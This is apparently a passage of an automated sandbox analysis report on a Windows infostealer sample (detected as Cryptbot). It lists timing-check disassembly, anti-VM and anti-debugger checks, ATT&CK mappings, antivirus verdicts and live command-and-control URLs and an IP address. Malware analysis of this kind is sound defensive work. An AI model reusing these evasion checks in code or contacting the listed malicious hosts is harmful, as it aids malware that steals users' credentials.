    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E80143 second address: 6E80147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E70844 second address: 6E70853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E70853 second address: 6E70859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E70859 second address: 6E7085D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E7085D second address: 6E708AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F519CFC89BEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dx, C6A0h 0x00000016 pushfd 0x00000017 jmp 00007F519CFC89C9h 0x0000001c and ah, FFFFFFA6h 0x0000001f jmp 00007F519CFC89C1h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803BD second address: 6E803C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803C3 second address: 6E803C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803C7 second address: 6E803CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803CB second address: 6E803F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, 1F9Ch 0x00000010 jmp 00007F519CFC89C5h 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803F1 second address: 6E803F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803F7 second address: 6E803FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803FB second address: 6E80417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov bl, 7Bh 0x0000000e mov ecx, 3B2F5D3Dh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E80417 second address: 6E8041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0A57 second address: 6EF0AB3 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 366Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F519CD4C382h 0x0000000f or cl, FFFFFF98h 0x00000012 jmp 00007F519CD4C37Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F519CD4C388h 0x0000001e add ch, FFFFFFF8h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0AB3 second address: 6EF0AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0AB9 second address: 6EF0B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e call 00007F519CD4C37Dh 0x00000013 push ecx 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F519CD4C383h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushad 0x00000021 mov dx, cx 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 jmp 00007F519CD4C37Ah 0x0000002c popad 0x0000002d mov dl, byte ptr [ebp+14h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B0F second address: 6EF0B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B2C second address: 6EF0B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F519CD4C387h 0x00000008 pop ecx 0x00000009 mov dx, 59ECh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [ebp+10h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 call 00007F519CD4C387h 0x0000001b pop esi 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B6C second address: 6EF0B92 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 471C3E4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d popad 0x0000000e and dl, 00000007h 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 test eax, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ax, bx 0x00000020 mov edx, 4DAA6D98h 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B92 second address: 6EF0BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F520D1D19C4h 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, dl 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0BB2 second address: 6EF0BD9 instructions: 0x00000000 rdtsc 0x00000002 mov bl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F519CFC89C9h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0BD9 second address: 6EF0BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f mov ecx, edi 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0BF7 second address: 6EF0A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 2307FA93h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d shr eax, 1 0x0000000f jmp 00007F519CFC89C6h 0x00000014 jmp 00007F520D44DF6Bh 0x00000019 jne 00007F519CFC89ADh 0x0000001b inc ecx 0x0000001c shr eax, 1 0x0000001e jne 00007F519CFC89ADh 0x00000020 imul ecx, ecx, 03h 0x00000023 movzx eax, dl 0x00000026 cdq 0x00000027 sub ecx, 03h 0x0000002a call 00007F519CFD8EADh 0x0000002f cmp cl, 00000040h 0x00000032 jnc 00007F519CFC89C7h 0x00000034 cmp cl, 00000020h 0x00000037 jnc 00007F519CFC89B8h 0x00000039 shld edx, eax, cl 0x0000003c shl eax, cl 0x0000003e ret 0x0000003f or edx, dword ptr [ebp+0Ch] 0x00000042 or eax, dword ptr [ebp+08h] 0x00000045 or edx, 80000000h 0x0000004b pop ebp 0x0000004c retn 0010h 0x0000004f push ebp 0x00000050 push 00000001h 0x00000052 push edx 0x00000053 push eax 0x00000054 call edi 0x00000056 mov edi, edi 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop edx 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0CF2 second address: 6ED0CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0CF6 second address: 6ED0CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0CFC second address: 6ED0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D16 second address: 6ED0D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D1A second address: 6ED0D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D1E second address: 6ED0D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D24 second address: 6ED0D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0527 second address: 6EE052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE052B second address: 6EE053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0684 second address: 6EE0772 instructions: 0x00000000 rdtsc 0x00000002 mov si, 396Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F519CFC89BEh 0x00000011 sub ecx, ecx 0x00000013 jmp 00007F519CFC89C1h 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d mov al, dh 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F519CFC89BBh 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 call 00007F519CFC89C4h 0x0000002d pushfd 0x0000002e jmp 00007F519CFC89C2h 0x00000033 or esi, 1961D3E8h 0x00000039 jmp 00007F519CFC89BBh 0x0000003e popfd 0x0000003f pop ecx 0x00000040 pushfd 0x00000041 jmp 00007F519CFC89C9h 0x00000046 or cx, 5A06h 0x0000004b jmp 00007F519CFC89C1h 0x00000050 popfd 0x00000051 popad 0x00000052 mov eax, 00000001h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushfd 0x0000005b jmp 00007F519CFC89C3h 0x00000060 and eax, 1E8B693Eh 0x00000066 jmp 00007F519CFC89C9h 0x0000006b popfd 0x0000006c push eax 0x0000006d pop ebx 0x0000006e popad 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0772 second address: 6EE07CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d pushad 0x0000000e call 00007F519CD4C37Ch 0x00000013 mov di, si 0x00000016 pop eax 0x00000017 mov edx, 5F5D2EB2h 0x0000001c popad 0x0000001d mov ecx, eax 0x0000001f jmp 00007F519CD4C389h 0x00000024 cmp ecx, 01h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F519CD4C37Dh 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE07CB second address: 6EE080C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F520D43A7A4h 0x0000000f jmp 00007F519CFC89BEh 0x00000014 pop edi 0x00000015 jmp 00007F519CFC89C0h 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE080C second address: 6EE0812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0812 second address: 6EE0816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\random(5).exeSpecial instruction interceptor: First address: 1580BFC instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(5).exeSpecial instruction interceptor: First address: 17293F0 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(5).exeSpecial instruction interceptor: First address: 17B98AB instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(5).exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_01019980 rdtsc 0_2_01019980
    Source: C:\Users\user\Desktop\random(5).exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E3255D
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E329FF
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E3255D
    Source: random(5).exe, random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: random(5).exe, 00000000.00000003.2251619808.000000000085F000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258565049.0000000000860000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251454551.0000000000848000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251477411.000000000084F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM419-!
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: random(5).exe, 00000000.00000003.2180479747.0000000006741000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j@jjY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#9
    Source: random(5).exeBinary or memory string: Hyper-V RAW
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
    Source: random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: random(5).exe, 00000000.00000003.2178594560.00000000007F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\random(5).exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\random(5).exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\random(5).exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(5).exeFile opened: NTICE
    Source: C:\Users\user\Desktop\random(5).exeFile opened: SICE
    Source: C:\Users\user\Desktop\random(5).exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\random(5).exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_01019980 rdtsc 0_2_01019980
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E31160 SetUnhandledExceptionFilter,0_2_00E31160
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E311A3 SetUnhandledExceptionFilter,0_2_00E311A3
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E313C9 SetUnhandledExceptionFilter,0_2_00E313C9
    Source: random(5).exe, random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
    Source: C:\Users\user\Desktop\random(5).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

    Stealing of Sensitive Information

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: random(5).exe PID: 5792, type: MEMORYSTR
    Infostealer behavior detected
    Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
    Leaks process information
    Source: global trafficTCP traffic: 192.168.2.6:49711 -> 34.147.147.173:80

    Remote Access Functionality

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: random(5).exe PID: 5792, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		23
    Virtualization/Sandbox Evasion    		OS Credential Dumping751
    Security Software Discovery    		1
    Exploitation of Remote Services    		11
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory23
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Data from Local System    		4
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager13
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput Capture15
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials216
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    random(5).exe49%VirustotalBrowse
    random(5).exe45%ReversingLabsWin32.Infostealer.Tinba
    random(5).exe100%AviraTR/Crypt.TPM.Gen
    random(5).exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    KvgPhome.fortth14vs.top100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZ0100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963100%Avira URL Cloudmalware
    .1.1home.fortth14vs.top100%Avira URL Cloudmalware
    fortth14vsh14vs.top0%Avira URL Cloudsafe
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0100%Avira URL Cloudmalware
    home.fortth14vs.top100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZ100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZT100%Avira URL Cloudmalware
    .for8014vs.top0%Avira URL Cloudsafe
    .forth14vs.top0%Avira URL Cloudsafe
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse100%Avira URL Cloudmalware
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    home.fortth14vs.top
    		34.147.147.173
    		truefalse
      		high
      httpbin.org
      		34.200.57.114
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        .1.1home.fortth14vs.toptrue
        • Avira URL Cloud: malware
        		unknown
        KvgPhome.fortth14vs.toptrue
        • Avira URL Cloud: malware
        		unknown
        fortth14vsh14vs.toptrue
        • Avira URL Cloud: safe
        		unknown
        https://httpbin.org/ipfalse
          		high
          home.fortth14vs.toptrue
          • Avira URL Cloud: malware
          		unknown
          http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0true
          • Avira URL Cloud: malware
          		unknown
          .for8014vs.toptrue
          • Avira URL Cloud: safe
          		unknown
          .forth14vs.toptrue
          • Avira URL Cloud: safe
          		unknown
          http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://html4/loose.dtdrandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://curl.se/docs/http-cookies.htmlrandom(5).exe, random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
